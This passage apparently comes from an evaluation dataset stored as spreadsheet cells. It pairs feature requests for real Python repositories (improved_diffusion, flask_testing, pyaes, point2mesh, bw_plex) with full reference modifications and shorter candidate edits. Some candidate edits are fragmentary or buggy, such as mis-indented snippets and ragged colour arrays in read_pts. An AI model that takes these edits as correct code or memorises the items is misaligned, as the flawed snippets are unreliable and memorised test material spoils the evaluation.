attention_resolutions.split(","):\n        attention_ds.append(large_size // int(res))\n\n    return SuperResModel(\n        in_channels=3,\n        model_channels=num_channels,\n        out_channels=(3 if not learn_sigma else 6),\n        num_res_blocks=num_res_blocks,\n        attention_resolutions=tuple(attention_ds),\n        dropout=dropout,\n        channel_mult=channel_mult,\n        num_classes=(NUM_CLASSES if class_cond else None),\n        use_checkpoint=use_checkpoint,\n        num_heads=num_heads,\n        num_heads_upsample=num_heads_upsample,\n        use_scale_shift_norm=use_scale_shift_norm,\n    )\n\ndef create_gaussian_diffusion(\n    *,\n    steps=1000,\n    learn_sigma=False,\n    sigma_small=False,\n    noise_schedule="linear",\n    use_kl=False,\n    predict_xstart=False,\n    rescale_timesteps=False,\n    rescale_learned_sigmas=False,\n    timestep_respacing="",\n):\n    betas = gd.get_named_beta_schedule(noise_schedule, steps)\n    if use_kl:\n        loss_type = gd.LossType.RESCALED_KL\n    elif rescale_learned_sigmas:\n        loss_type = gd.LossType.RESCALED_MSE\n    else:\n        loss_type = gd.LossType.MSE\n    if not timestep_respacing:\n        timestep_respacing = [steps]\n    return SpacedDiffusion(\n        use_timesteps=space_timesteps(steps, timestep_respacing),\n        betas=betas,\n        model_mean_type=(\n            gd.ModelMeanType.EPSILON if not predict_xstart else gd.ModelMeanType.START_X\n        ),\n        model_var_type=(\n            (\n                gd.ModelVarType.FIXED_LARGE\n                if not sigma_small\n                else gd.ModelVarType.FIXED_SMALL\n            )\n            if not learn_sigma\n            else gd.ModelVarType.LEARNED_RANGE\n        ),\n        loss_type=loss_type,\n        rescale_timesteps=rescale_timesteps,\n    )\n\ndef add_dict_to_argparser(parser, default_dict):\n    for k, v in default_dict.items():\n        v_type = type(v)\n        if v is None:\n            v_type = str\n        elif isinstance(v, bool):\n            v_type = str2bool\n        parser.add_argument(f"--{k}", default=v, type=v_type)\n\ndef args_to_dict(args, keys):\n    return {k: getattr(args, k) for k in keys}\n\ndef str2bool(v):\n    if isinstance(v, bool):\n        return v\n    if v.lower() in ("yes", "true", "t", "y", "1"):\n        return True\n    elif v.lower() in ("no", "false", "f", "n", "0"):\n        return False\n    else:\n        raise argparse.ArgumentTypeError("boolean value expected")\n\n# Modified image_train.py\nimport argparse\n\nfrom improved_diffusion import dist_util, logger\nfrom improved_diffusion.image_datasets import load_data\nfrom improved_diffusion.resample import create_named_schedule_sampler\nfrom improved_diffusion.script_util import (\n    model_and_diffusion_defaults,\n    create_model_and_diffusion,\n    args_to_dict,\n    add_dict_to_argparser,\n)\nfrom improved_diffusion.train_util import TrainLoop\n\ndef main():\n    args = create_argparser().parse_args()\n\n    dist_util.setup_dist()\n    logger.configure()\n\n    # Modify: Add logging before model and diffusion creation\n    logger.log("Starting model and diffusion creation process...")\n    logger.log(f"Configuration: image_size={args.image_size}, batch_size={args.batch_size}, diffusion_steps={args.diffusion_steps}")\n    \n    logger.log("creating model and diffusion...")\n    model, diffusion = create_model_and_diffusion(\n        **args_to_dict(args, model_and_diffusion_defaults().keys())\n    )\n    \n    # New: Log successful model and diffusion creation\n    logger.log(f"Model and diffusion creation completed successfully.")\n    logger.log(f"Model parameters: {sum(p.numel() for p in model.parameters())} total parameters")\n    \n    model.to(dist_util.dev())\n    schedule_sampler = create_named_schedule_sampler(args.schedule_sampler, diffusion)\n\n    logger.log("creating data loader...")\n    data = load_data(\n        data_dir=args.data_dir,\n        batch_size=args.batch_size,\n        image_size=args.image_size,\n        class_cond=args.class_cond,\n    )\n\n    logger.log("training...")\n    TrainLoop(\n        model=model,\n        diffusion=diffusion,\n        data=data,\n        batch_size=args.batch_size,\n        microbatch=args.microbatch,\n        lr=args.lr,\n        ema_rate=args.ema_rate,\n        log_interval=args.log_interval,\n        save_interval=args.save_interval,\n        resume_checkpoint=args.resume_checkpoint,\n        use_fp16=args.use_fp16,\n        fp16_scale_growth=args.fp16_scale_growth,\n        schedule_sampler=schedule_sampler,\n        weight_decay=args.weight_decay,\n        lr_anneal_steps=args.lr_anneal_steps,\n    ).run_loop()\n\ndef create_argparser():\n    defaults = dict(\n        data_dir="",\n        schedule_sampler="uniform",\n        lr=1e-4,\n        weight_decay=0.0,\n        lr_anneal_steps=0,\n        batch_size=1,\n        microbatch=-1,\n        ema_rate="0.9999",\n        log_interval=10,\n        save_interval=10000,\n        resume_checkpoint="",\n        use_fp16=False,\n        fp16_scale_growth=1e-3,\n    )\n    defaults.update(model_and_diffusion_defaults())\n    parser = argparse.ArgumentParser()\n    add_dict_to_argparser(parser, defaults)\n    return parser\n\nif __name__ == "__main__":\n    main()'}</t>
  </si>
  <si>
    <t>{'#file 1': "import logging\n\n#Modify\ndef create_model_and_diffusion(...):\n    logging.info('Creating model...')\n    model = create_model(...)\n    logging.info('Creating diffusion...')\n    diffusion = create_gaussian_diffusion(...)\n    logging.info('Model and diffusion created successfully.')\n    return model, diffusion", '#file 2': 'import logging\n\n#Modify\nmodel, diffusion = create_model_and_diffusion(\n        **args_to_dict(args, model_and_diffusion_defaults().keys())\n    )\nlogging.basicConfig(level=logging.INFO)', '#file 3': 'import logging\n\n#Modify\nmodel.to(dist_util.dev())\n    schedule_sampler = create_named_schedule_sampler(args.schedule_sampler, diffusion)\nlogging.basicConfig(level=logging.INFO)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class Twill(object) and its __enter__ method in flask_testing/twill.py', 'invoking_code_segment': 'with self.twill as t: in flask-testing/examples/twill_site/tests.py', 'feature_description': 'Add a feature to log the URL visited by the browser during the test. This feature will track and store all URLs visited during test execution, allowing developers to review the navigation history of their tests.', 'modified_complete_code': '# flask_testing/twill.py - Modified to add URL logging\n# #New - Add logging import at the top\nimport logging\nfrom contextlib import contextmanager\n\nlogger = logging.getLogger(__name__)\n\nclass Twill(object):\n    def __init__(self, app):\n        self.app = app\n        # #New - Initialize visited_urls list to track browser navigation\n        self.visited_urls = []\n        # ... existing code ...\n    \n    # #Modify - Enhanced __enter__ method to track URLs\n    def __enter__(self):\n        # #New - Store reference to self for URL tracking\n        self._original_go = self.browser.go\n        \n        def tracked_go(url):\n            # #New - Log and track the URL being visited\n            full_url = self.url(url) if not url.startswith(\'http\') else url\n            self.visited_urls.append(full_url)\n            logger.info(f"Browser visiting URL: {full_url}")\n            return self._original_go(url)\n        \n        # #New - Replace browser.go with tracked version\n        self.browser.go = tracked_go\n        return self\n    \n    def __exit__(self, *args):\n        # #New - Log summary of visited URLs\n        logger.info(f"Test completed. Visited URLs: {self.visited_urls}")\n        # ... existing code ...\n    \n    # #New - Add method to retrieve visited URLs\n    def get_visited_urls(self):\n        """Return list of all URLs visited during the test"""\n        return self.visited_urls\n\n# flask-testing/examples/twill_site/tests.py - Modified to use URL logging\nfrom twill.browser import TwillException\nfrom flask_testing import TestCase, Twill\n\nfrom todos import create_app\n\nclass TestViews(TestCase):\n\n    def create_app(self):\n        app = create_app()\n        self.twill = Twill(app)\n        return app\n\n    def test_manually(self):\n        with self.twill as t:\n            t.browser.go(self.twill.url("/"))\n            t.browser.showforms()\n            t.browser.submit(0)\n            # #New - Log visited URLs after test\n            print(f"Visited URLs: {t.get_visited_urls()}")\n\n    def test_bad_manually(self):\n        with self.twill as t:\n            t.browser.go(self.twill.url("/foo/"))\n            t.browser.showforms()\n            self.assertRaises(TwillException, t.browser.submit, 1)\n            # #New - Log visited URLs after test\n            print(f"Visited URLs: {t.get_visited_urls()}")\n'}</t>
  </si>
  <si>
    <t>{'#file 1': "from twill.browser import TwillException\nfrom flask_testing import TestCase, Twill\nimport logging\n\nclass TestViews(TestCase):\n\n    def create_app(self):\n        app = create_app()\n        self.twill = Twill(app)\n        #Modify: Add logger\n        self.logger = logging.getLogger('test_logger')\n        self.logger.setLevel(logging.INFO)\n        ch = logging.StreamHandler()\n        ch.setLevel(logging.INFO)\n        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n        ch.setFormatter(formatter)\n        self.logger.addHandler(ch)\n        return app", '#file 2': 'def test_manually(self):\n    with self.twill as t:\n        url = self.twill.url("/")\n        t.browser.go(url)\n        #Modify: Log the URL visited\n        self.logger.info(f\'Visited URL: {url}\')\n        t.browser.showforms()\n        t.browser.submit(0)', '#file 3': 'def test_bad_manually(self):\n    with self.twill as t:\n        url = self.twill.url("/foo/")\n        t.browser.go(url)\n        #Modify: Log the URL visited\n        self.logger.info(f\'Visited URL: {url}\')\n        t.browser.showforms()\n        self.assertRaises(TwillException, t.browser.submit, 1)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'strip_PKCS7_padding(data) function in pyaes/pyaes/util.py', 'invoking_code_segment': '_block_final_decrypt(self, data, padding = PADDING_DEFAULT) function in pyaes/pyaes/blockfeeder.py', 'feature_description': 'Add support for custom padding schemes in decryption by introducing a padding handler registry that allows users to define and use custom padding removal functions alongside the default PKCS7 padding', 'modified_complete_code': '# pyaes/pyaes/util.py - MODIFIED\n\ndef to_bufferable(binary):\n    return binary\n\ndef _get_byte(c):\n    return ord(c)\n\ntry:\n    xrange\nexcept:\n    def to_bufferable(binary):\n        if isinstance(binary, bytes):\n            return binary\n        return bytes(ord(b) for b in binary)\n\n    def _get_byte(c):\n        return c\n\ndef append_PKCS7_padding(data):\n    pad = 16 - (len(data) % 16)\n    return data + to_bufferable(chr(pad) * pad)\n\ndef strip_PKCS7_padding(data):\n    if len(data) % 16 != 0:\n        raise ValueError("invalid length")\n    pad = _get_byte(data[-1])\n    if pad &gt; 16:\n        raise ValueError("invalid padding byte")\n    return data[:-pad]\n\n#New - Custom padding handler registry\n_padding_handlers = {}\n\ndef register_padding_handler(padding_name, strip_func):\n    \'\'\'Register a custom padding handler for decryption.\n    \n    Args:\n        padding_name: Name identifier for the padding scheme\n        strip_func: Function that takes data and returns unpadded data\n    \'\'\'\n    _padding_handlers[padding_name] = strip_func\n\ndef get_padding_handler(padding_name):\n    \'\'\'Retrieve a registered padding handler.\n    \n    Args:\n        padding_name: Name identifier for the padding scheme\n        \n    Returns:\n        The padding handler function or None if not found\n    \'\'\'\n    return _padding_handlers.get(padding_name)\n\ndef strip_padding(data, padding_name=\'default\'):\n    \'\'\'Strip padding from data using registered handler.\n    \n    Args:\n        data: The padded data\n        padding_name: Name of the padding scheme to use\n        \n    Returns:\n        Data with padding removed\n    \'\'\'\n    if padding_name == \'default\':\n        return strip_PKCS7_padding(data)\n    \n    handler = get_padding_handler(padding_name)\n    if handler is None:\n        raise ValueError(f"Unknown padding scheme: {padding_name}")\n    \n    return handler(data)\n\n# pyaes/pyaes/blockfeeder.py - MODIFIED\n\nfrom .aes import AESBlockModeOfOperation, AESSegmentModeOfOperation, AESStreamModeOfOperation\nfrom .util import append_PKCS7_padding, strip_PKCS7_padding, to_bufferable, strip_padding #Modify - added strip_padding import\n\nPADDING_NONE       = \'none\'\nPADDING_DEFAULT    = \'default\'\n\ndef _block_can_consume(self, size):\n    if size &gt;= 16: return 16\n    return 0\n\ndef _block_final_encrypt(self, data, padding = PADDING_DEFAULT):\n    if padding == PADDING_DEFAULT:\n        data = append_PKCS7_padding(data)\n    elif padding == PADDING_NONE:\n        if len(data) != 16:\n            raise Exception(\'invalid data length for final block\')\n    else:\n        raise Exception(\'invalid padding option\')\n    if len(data) == 32:\n        return self.encrypt(data[:16]) + self.encrypt(data[16:])\n    return self.encrypt(data)\n\n#Modify - Updated to support custom padding schemes\ndef _block_final_decrypt(self, data, padding = PADDING_DEFAULT):\n    if padding == PADDING_DEFAULT:\n        return strip_PKCS7_padding(self.decrypt(data))\n    elif padding == PADDING_NONE:\n        if len(data) != 16:\n            raise Exception(\'invalid data length for final block\')\n        return self.decrypt(data)\n    else:\n        #New - Support custom padding handlers\n        decrypted = self.decrypt(data)\n        try:\n            return strip_padding(decrypted, padding)\n        except ValueError:\n            raise Exception(f\'invalid padding option: {padding}\')\n\nAESBlockModeOfOperation._can_consume = _block_can_consume\nAESBlockModeOfOperation._final_encrypt = _block_final_encrypt\nAESBlockModeOfOperation._final_decrypt = _block_final_decrypt\n\ndef _segment_can_consume(self, size):\n    return self.segment_bytes * int(size // self.segment_bytes)\n\ndef _segment_final_encrypt(self, data, padding = PADDING_DEFAULT):\n    if padding != PADDING_DEFAULT:\n        raise Exception(\'invalid padding option\')\n    faux_padding = (chr(0) * (self.segment_bytes - (len(data) % self.segment_bytes)))\n    padded = data + to_bufferable(faux_padding)\n    return self.encrypt(padded)[:len(data)]\n\ndef _segment_final_decrypt(self, data, padding = PADDING_DEFAULT):\n    if padding != PADDING_DEFAULT:\n        raise Exception(\'invalid padding option\')\n    faux_padding = (chr(0) * (self.segment_bytes - (len(data) % self.segment_bytes)))\n    padded = data + to_bufferable(faux_padding)\n    return self.decrypt(padded)[:len(data)]\n\nAESSegmentModeOfOperation._can_consume = _segment_can_consume\nAESSegmentModeOfOperation._final_encrypt = _segment_final_encrypt\nAESSegmentModeOfOperation._final_decrypt = _segment_final_decrypt\n\ndef _stream_can_consume(self, size):\n    return size\n\ndef _stream_final_encrypt(self, data, padding = PADDING_DEFAULT):\n    if padding not in [PADDING_NONE, PADDING_DEFAULT]:\n        raise Exception(\'invalid padding option\')\n    return self.encrypt(data)\n\ndef _stream_final_decrypt(self, data, padding = PADDING_DEFAULT):\n    if padding not in [PADDING_NONE, PADDING_DEFAULT]:\n        raise Exception(\'invalid padding option\')\n    return self.decrypt(data)\n\nAESStreamModeOfOperation._can_consume = _stream_can_consume\nAESStreamModeOfOperation._final_encrypt = _stream_final_encrypt\nAESStreamModeOfOperation._final_decrypt = _stream_final_decrypt\n\nclass BlockFeeder(object):\n    def __init__(self, mode, feed, final, padding = PADDING_DEFAULT):\n        self._mode = mode\n        self._feed = feed\n        self._final = final\n        self._buffer = to_bufferable("")\n        self._padding = padding\n\n    def feed(self, data = None):\n        if self._buffer is None:\n            raise ValueError(\'already finished feeder\')\n        if data is None:\n            result = self._final(self._buffer, self._padding)\n            self._buffer = None\n            return result\n        self._buffer += to_bufferable(data)\n        result = to_bufferable(\'\')\n        while len(self._buffer) &gt; 16:\n            can_consume = self._mode._can_consume(len(self._buffer) - 16)\n            if can_consume == 0: break\n            result += self._feed(self._buffer[:can_consume])\n            self._buffer = self._buffer[can_consume:]\n        return result\n\nclass Encrypter(BlockFeeder):\n    def __init__(self, mode, padding = PADDING_DEFAULT):\n        BlockFeeder.__init__(self, mode, mode.encrypt, mode._final_encrypt, padding)\n\nclass Decrypter(BlockFeeder):\n    def __init__(self, mode, padding = PADDING_DEFAULT):\n        BlockFeeder.__init__(self, mode, mode.decrypt, mode._final_decrypt, padding)\n\nBLOCK_SIZE = (1 &lt;&lt; 13)\n\ndef _feed_stream(feeder, in_stream, out_stream, block_size = BLOCK_SIZE):\n    while True:\n        chunk = in_stream.read(block_size)\n        if not chunk:\n            break\n        converted = feeder.feed(chunk)\n        out_stream.write(converted)\n    converted = feeder.feed()\n    out_stream.write(converted)\n\ndef encrypt_stream(mode, in_stream, out_stream, block_size = BLOCK_SIZE, padding = PADDING_DEFAULT):\n    encrypter = Encrypter(mode, padding = padding)\n    _feed_stream(encrypter, in_stream, out_stream, block_size)\n\ndef decrypt_stream(mode, in_stream, out_stream, block_size = BLOCK_SIZE, padding = PADDING_DEFAULT):\n    decrypter = Decrypter(mode, padding = padding)\n    _feed_stream(decrypter, in_stream, out_stream, block_size)'}</t>
  </si>
  <si>
    <t>{'file_1': 'def _get_byte(c):\n    return ord(c)  #Modify', 'file_2': "def strip_PKCS7_padding(data, custom_padding=None):\n    if len(data) % 16 != 0:\n        raise ValueError('invalid length')\n\n    if custom_padding:\n        return custom_padding(data)\n\n    pad = _get_byte(data[-1])\n\n    if pad &gt; 16:\n        raise ValueError('invalid padding byte')\n\n    return data[:-pad]  #Modify", 'file_3': "def _block_final_decrypt(self, data, padding = PADDING_DEFAULT, custom_padding=None):\n    if padding == PADDING_DEFAULT:\n        return strip_PKCS7_padding(self.decrypt(data), custom_padding)\n\n    if padding == PADDING_NONE:\n        if len(data) != 16:\n            raise Exception('invalid data length for final block')\n        return self.decrypt(data)\n\n    raise Exception('invalid padding option')  #Modify"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'read_pts function in point2mesh/utils.py that reads point cloud data from files', 'invoking_code_segment': 'run function in point2mesh/scripts/process_data/convex_hull.py that calls read_pts(args.i)', 'feature_description': 'Add a feature to read and process point clouds with additional metadata, such as color information. The read_pts function will be enhanced to parse color data from point cloud files, and the convex_hull.py script will be updated to handle and preserve color information during processing.', 'modified_complete_code': '# point2mesh/utils.py - MODIFIED read_pts function\ndef read_pts(pts_file, read_color=False):\n    \'\'\'\n    :param pts_file: file path of a plain text list of points\n    such that a particular line has 6+ float values: x, y, z, nx, ny, nz[, r, g, b]\n    which is typical for (plaintext) .ply or .xyz\n    :param read_color: if True, attempt to read color information (r, g, b) from columns 7-9\n    :return: xyz, normals, colors (colors is None if read_color=False or not available)\n    \'\'\'\n    xyz, normals = [], []\n    colors = [] if read_color else None  # #New: Initialize colors list if requested\n    with open(pts_file, \'r\') as f:\n        spt = f.read().split(\'\\n\')\n        for line in spt:\n            parts = line.strip().split(\' \')\n            try:\n                x = np.array(parts, dtype=np.float32)\n                xyz.append(x[:3])\n                normals.append(x[3:6])\n                # #New: Extract color information if available and requested\n                if read_color and len(x) &gt;= 9:\n                    colors.append(x[6:9])\n                elif read_color:\n                    colors.append(np.array([1.0, 1.0, 1.0], dtype=np.float32))  # #New: Default white color\n            except:\n                pass\n    # #Modify: Return colors as third element\n    if read_color:\n        return np.array(xyz, dtype=np.float32), np.array(normals, dtype=np.float32), np.array(colors, dtype=np.float32)\n    else:\n        return np.array(xyz, dtype=np.float32), np.array(normals, dtype=np.float32), None\n\n# point2mesh/scripts/process_data/convex_hull.py - MODIFIED run function and additions\ndef run(args):\n    # #Modify: Call read_pts with read_color parameter\n    xyz, normals, colors = read_pts(args.i, read_color=True)\n\n    m = trimesh.convex.convex_hull(xyz[:, :3])\n    vs, faces = m.vertices, m.faces\n\n    # #Modify: Pass colors to export function\n    export(args.o, vs, faces, color=colors if colors is not None else None)\n\n    if args.blender:\n        blender_rehull(args.o, args.o, args.blender_res, args.blender_path)\n    else:\n        inplace_manifold(args.o, args.manifold_res, args.manifold_path)\n\n    num_faces = count_faces(args.o)\n    if args.blender:\n        num_faces /= 2\n    num_faces = int(num_faces)\n    if num_faces &lt; args.faces:\n        software = \'blender\' if args.blender else \'manifold\'\n        warnings.warn(f\'only {num_faces} faces where generated by {software}. \'\n                      f\'try increasing --{software}-res to achieve the desired target of {args.faces} faces\')\n    else:\n        inplace_simplify(args.o, args.faces, args.manifold_path)\n\n    print(\'*** Done! ****\')\n\n# point2mesh/utils.py - MODIFIED export function to handle colors properly\ndef export(file, vs, faces, vn=None, color=None):\n    with open(file, \'w+\') as f:\n        for vi, v in enumerate(vs):\n            if color is None:\n                f.write("v %f %f %f\\n" % (v[0], v[1], v[2]))\n            else:\n                # #Modify: Ensure color values are within valid range [0, 1] or [0, 255]\n                c = color[vi] if vi &lt; len(color) else np.array([1.0, 1.0, 1.0])\n                f.write("v %f %f %f %f %f %f\\n" % (v[0], v[1], v[2], c[0], c[1], c[2]))\n            if vn is not None:\n                f.write("vn %f %f %f\\n" % (vn[vi, 0], vn[vi, 1], vn[vi, 2]))\n        for face in faces:\n            f.write("f %d %d %d\\n" % (face[0] + 1, face[1] + 1, face[2] + 1))'}</t>
  </si>
  <si>
    <t>{'#file 1': "def read_pts(pts_file):\n    '''\n    :param pts_file: file path of a plain text list of points\n    such that a particular line has 6 float values: x, y, z, nx, ny, nz\n    which is typical for (plaintext) .ply or .xyz\n    :return: xyz, normals, colors\n    '''\n    xyz, normals, colors = [], [], []\n    with open(pts_file, 'r') as f:\n        spt = f.read().split('\\n')\n        for line in spt:\n            parts = line.strip().split(' ')\n            try:\n                x = np.array(parts, dtype=np.float32)\n                xyz.append(x[:3])\n                normals.append(x[3:6])\n                colors.append(x[6:])\n            except:\n                pass\n    return np.array(xyz, dtype=np.float32), np.array(normals, dtype=np.float32), np.array(colors, dtype=np.float32)  #Modify", '#file 2': "def run(args):\n    xyz, normals, colors = read_pts(args.i)  #Modify\n\n    m = trimesh.convex.convex_hull(xyz[:, :3])\n    vs, faces = m.vertices, m.faces\n\n    export(args.o, vs, faces, vn=normals, color=colors)  #Modify\n\n    if args.blender:\n        blender_rehull(args.o, args.o, args.blender_res, args.blender_path)\n    else:\n        inplace_manifold(args.o, args.manifold_res, args.manifold_path)\n\n    num_faces = count_faces(args.o)\n    if args.blender:\n        num_faces /= 2\n    num_faces = int(num_faces)\n    if num_faces &lt; args.faces:\n        software = 'blender' if args.blender else 'manifold'\n        warnings.warn(f'only {num_faces} faces where generated by {software}. '\n                      f'try increasing --{software}-res to achieve the desired target of {args.faces} faces')", '#file 3': "num_faces = count_faces(args.o)\n    if args.blender:\n        num_faces /= 2\n    num_faces = int(num_faces)\n    if num_faces &lt; args.faces:\n        software = 'blender' if args.blender else 'manifold'\n        warnings.warn(f'only {num_faces} faces where generated by {software}. '\n                      f'try increasing --{software}-res to achieve the desired target of {args.faces} faces')\n\n    # New: Ensure that the output file contains the correct metadata\n    with open(args.o, 'r') as f:\n        lines = f.readlines()\n    with open(args.o, 'w') as f:\n        for line in lines:\n            if line.startswith('v '):\n                parts = line.strip().split(' ')\n                f.write(' '.join(parts[:4]) + ' ' + ' '.join(parts[4:]) + '\\n')\n            else:\n                f.write(line)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def set_manual_theme_time(showname, season, episode, type, start, end) in bw_plex/bw_plex/plex.py - This function allows users to manually set theme start and end times for episodes in the database.', 'invoking_code_segment': 'fake_main() in bw_plex/bw_plex/cli.py imports and calls real_main() from bw_plex.plex, which includes the CLI command set_manual_theme_time via the @cli.command() decorator.', 'feature_description': 'Add a feature to allow users to specify a custom theme start time for episodes through an enhanced CLI command that validates input, provides better error handling, and supports both manual time entry and interactive selection modes.', 'modified_complete_code': '@cli.command()\n@click.argument(\'showname\')\n@click.argument(\'season\', type=int)\n@click.argument(\'episode\', type=int)\n@click.option(\'--type\', \'-t\', default=\'theme\', type=click.Choice([\'theme\', \'credits\', \'ffmpeg\']), help=\'Type of timing to set\')\n@click.option(\'--start\', \'-s\', default=None, help=\'Start time in MM:SS or seconds format\')\n@click.option(\'--end\', \'-e\', default=None, help=\'End time in MM:SS or seconds format\')\n#New @click.option(\'--interactive\', \'-i\', default=False, is_flag=True, help=\'Use interactive mode to set custom theme start time\')\ndef set_manual_theme_time(showname, season, episode, type, start, end, interactive):  # pragma: no cover\n    """Set a manual start and end time for a theme or other timing markers.\n\n       Args:\n           showname(str): name of the show you want to find\n           season(int): season number fx 1\n           episode(int): episode number 1\n           type(str): theme, credits, ffmpeg\n           start(int, str): This can be in seconds or MM:SS format\n           end(int, str): This can be in seconds or MM:SS format\n           #New interactive(bool): Enable interactive mode for custom theme start time selection\n\n       Returns:\n            None\n    """\n    LOG.debug(\'Trying to set manual time\')\n    result = PMS.search(showname)\n\n    if result:\n        items = choose(\'Select show\', result, \'title\')\n        show = items[0]\n        ep = show.episode(season=season, episode=episode)\n\n        if ep:\n            with session_scope() as se:\n                try:\n                    item = se.query(Processed).filter_by(ratingKey=ep.ratingKey).one()\n                    \n                    #New if interactive:\n                    #New     click.echo(\'Interactive mode for custom theme start time\')\n                    #New     click.echo(\'Current episode: %s\' % ep._prettyfilename())\n                    #New     if item.theme_start != -1:\n                    #New         click.echo(\'Current theme start: %s (%s seconds)\' % (to_time(item.theme_start), item.theme_start))\n                    #New     custom_start = click.prompt(\'Enter custom theme start time (MM:SS or seconds)\', default=None)\n                    #New     if custom_start:\n                    #New         start = custom_start\n                    #New     custom_end = click.prompt(\'Enter custom theme end time (MM:SS or seconds)\', default=None)\n                    #New     if custom_end:\n                    #New         end = custom_end\n                    \n                    #Modify if start is not None:\n                    #Modify     try:\n                    #Modify         start_sec = to_sec(start)\n                    #Modify     except (ValueError, TypeError):\n                    #Modify         click.secho(\'Invalid start time format: %s\' % start, fg=\'red\')\n                    #Modify         return\n                    #Modify else:\n                    #Modify     start_sec = None\n                    \n                    #Modify if end is not None:\n                    #Modify     try:\n                    #Modify         end_sec = to_sec(end)\n                    #Modify     except (ValueError, TypeError):\n                    #Modify         click.secho(\'Invalid end time format: %s\' % end, fg=\'red\')\n                    #Modify         return\n                    #Modify else:\n                    #Modify     end_sec = None\n\n                    if type == \'ffmpeg\':\n                        if end_sec is not None:\n                            item.correct_ffmpeg = end_sec\n                            click.secho(\'Set ffmpeg end time to %s (%s seconds)\' % (to_time(end_sec), end_sec), fg=\'green\')\n\n                    elif type == \'theme\':\n                        if start_sec is not None:\n                            item.correct_theme_start = start_sec\n                            click.secho(\'Set theme start time to %s (%s seconds)\' % (to_time(start_sec), start_sec), fg=\'green\')\n\n                        if end_sec is not None:\n                            item.correct_theme_end = end_sec\n                            click.secho(\'Set theme end time to %s (%s seconds)\' % (to_time(end_sec), end_sec), fg=\'green\')\n                    \n                    elif type == \'credits\':\n                        if start_sec is not None:\n                            item.correct_credits_start = start_sec\n                            click.secho(\'Set credits start time to %s (%s seconds)\' % (to_time(start_sec), start_sec), fg=\'green\')\n\n                        if end_sec is not None:\n                            item.correct_credits_end = end_sec\n                            click.secho(\'Set credits end time to %s (%s seconds)\' % (to_time(end_sec), end_sec), fg=\'green\')\n\n                    LOG.debug(\'Set %s timing for %s to start %s end %s\',\n                              type, ep._prettyfilename(), start_sec, end_sec)\n                    \n                except NoResultFound:\n                    click.secho(\'Episode not found in database: %s S%dE%d\' % (showname, season, episode), fg=\'red\')\n                    LOG.debug(\'Episode %s not found in database\', ep.ratingKey)\n        else:\n            click.secho(\'Could not find episode: %s Season %d Episode %d\' % (showname, season, episode), fg=\'red\')\n    else:\n        click.secho(\'Could not find show: %s\' % showname, fg=\'red\')\n\n#New @cli.command()\n#New @click.argument(\'showname\')\n#New @click.option(\'--season\', \'-s\', type=int, default=None, help=\'Season number\')\n#New @click.option(\'--episode\', \'-e\', type=int, default=None, help=\'Episode number\')\n#New def set_custom_theme_start(showname, season, episode):  # pragma: no cover\n#New     """Interactive command to set custom theme start time for episodes.\n#New     \n#New        Args:\n#New            showname(str): name of the show\n#New            season(int): season number (optional)\n#New            episode(int): episode number (optional)\n#New        \n#New        Returns:\n#New             None\n#New     """\n#New     result = PMS.search(showname)\n#New     \n#New     if not result:\n#New         click.secho(\'Show not found: %s\' % showname, fg=\'red\')\n#New         return\n#New     \n#New     items = choose(\'Select show\', result, \'title\')\n#New     show = items[0]\n#New     \n#New     if season and episode:\n#New         ep = show.episode(season=season, episode=episode)\n#New         episodes = [ep] if ep else []\n#New     else:\n#New         click.echo(\'Select episodes to update theme start time:\')\n#New         seasons = show.seasons()\n#New         selected_season = choose(\'Select season\', seasons, lambda x: \'Season %d\' % x.index)\n#New         if selected_season:\n#New             episodes = choose(\'Select episodes\', selected_season[0].episodes(), \n#New                              lambda x: \'S%dE%d - %s\' % (x.seasonNumber, x.episodeNumber, x.title))\n#New         else:\n#New             return\n#New     \n#New     with session_scope() as se:\n#New         for ep in episodes:\n#New             try:\n#New                 item = se.query(Processed).filter_by(ratingKey=ep.ratingKey).one()\n#New                 click.echo(\'\\nEpisode: %s\' % ep._prettyfilename())\n#New                 if item.theme_start != -1:\n#New                     click.echo(\'Current theme start: %s (%s seconds)\' % (to_time(item.theme_start), item.theme_start))\n#New                 \n#New                 custom_start = click.prompt(\'Enter new theme start time (MM:SS or seconds, or press Enter to skip)\', default=None)\n#New                 if custom_start:\n#New                     try:\n#New                         start_sec = to_sec(custom_start)\n#New                         item.correct_theme_start = start_sec\n#New                         click.secho(\'Updated theme start to %s (%s seconds)\' % (to_time(start_sec), start_sec), fg=\'green\')\n#New                     except (ValueError, TypeError):\n#New                         click.secho(\'Invalid time format: %s\' % custom_start, fg=\'red\')\n#New             except NoResultFound:\n#New                 click.secho(\'Episode not in database: %s\' % ep._prettyfilename(), fg=\'yellow\')\n#New         \n#New         if se.dirty:\n#New             se.commit()\n#New             click.secho(\'Changes saved to database\', fg=\'green\')'}</t>
  </si>
  <si>
    <t>{'file_1': "def process_to_db(media, theme=None, vid=None, start=None, end=None, ffmpeg_end=None, recap=None, credits_start=None, credits_end=None, custom_theme_start=None):\n    ...\n    if media.TYPE == 'episode' and theme is None:\n        if HT.has_theme(media, add_if_missing=False) is False:\n            LOG.debug('downloading theme from process_to_db')\n            theme = download_theme(media, HT)\n    ...\n    if custom_theme_start is not None:\n        start = custom_theme_start\n    ...\n", 'file_2': "def task(item, sessionkey):\n    ...\n    media = PMS.fetchItem(int(item))\n    LOG.debug('Found %s', media._prettyfilename())\n    if media.TYPE not in ('episode', 'show', 'movie'):  # pragma: no cover\n        return\n\n    if media.TYPE == 'episode':\n        LOG.debug('Download the first 10 minutes of %s as .wav', media._prettyfilename())\n        vid = convert_and_trim(check_file_access(media), fs=11025, trim=CONFIG['tv'].get('check_for_theme_sec', 600))\n        custom_theme_start = CONFIG['tv'].get('custom_theme_start', None)  # New\n        process_to_db(media, vid=vid, custom_theme_start=custom_theme_start)  # Modify\n    ...\n    try:\n        os.remove(vid)\n        LOG.debug('Deleted %s', vid)\n    except IOError:  # pragma: no cover\n        LOG.exception('Failed to delete %s', vid)\n    ...\n", 'file_3': "def check(data):\n    ...\n    if data.get('type') == 'playing' and data.get('PlaySessionStateNotification'):\n        sess = data.get('PlaySessionStateNotification')[0]\n        if sess.get('state') != 'playing':\n            return\n        ratingkey = int(sess.get('ratingKey'))\n        sessionkey = int(sess.get('sessionKey'))\n        progress = sess.get('viewOffset', 0) / 1000  # converted to sec.\n        mode = CONFIG['general'].get('mode', 'skip_only_theme')\n        no_wait_tick = CONFIG['general'].get('no_wait_tick', 